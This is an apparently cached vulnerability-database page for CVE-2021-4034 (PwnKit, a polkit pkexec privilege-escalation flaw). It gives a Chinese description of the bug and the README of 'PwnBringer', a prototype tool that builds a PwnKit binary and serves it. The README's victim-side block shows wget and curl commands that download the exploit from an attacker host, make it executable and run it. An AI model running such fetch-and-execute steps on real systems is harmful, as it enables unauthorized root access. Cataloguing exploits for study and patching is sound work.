CVE-2021-4034 PoC — polkit 缓冲区错误漏洞

Source

https://github.com/G01d3nW01f/CVE-2021-4034

Associated Vulnerability

Title:polkit 缓冲区错误漏洞 (CVE-2021-4034)
Description:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则，实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞，攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后，如果目标计算机上没有权限的用户拥有管理权限，攻击可能会导致本地权限升级。

Description

PwnKit auto generate and Serve

Readme

# PwnBringer
auto generate and Serve Of PwnKit

compile the source code to binary for pwnkit
and automaticaly python server is on,

this is ProtoType
so, perhaps not work depending on the environment.

```
chmod +x PwnBringer.py
./PwnBringer.py <lhost> <lport>
```

![alt text](https://github.com/Ki11i0n4ir3/PwnBringer/blob/main/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88%202022-02-03%20120934.png)

```
[VictimSide]

user1@deb:~$ wget http://192.168.0.4:1234/PwnKit 
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit

or

user1@deb:~$ curl http://192.168.0.4:1234/PwnKit -o PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
```

![alt text](https://github.com/Ki11i0n4ir3/gifs/blob/main/daddy2.gif)

File Snapshot


 [4.0K]  /data/pocs/14afd9cb071f8afeaba0087780089d23504011ff
├── [5.5K]  PwnBringer.py
├── [ 749]  README.md
└── [ 13K]  スクリーンショット 2022-02-03 120934.png

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!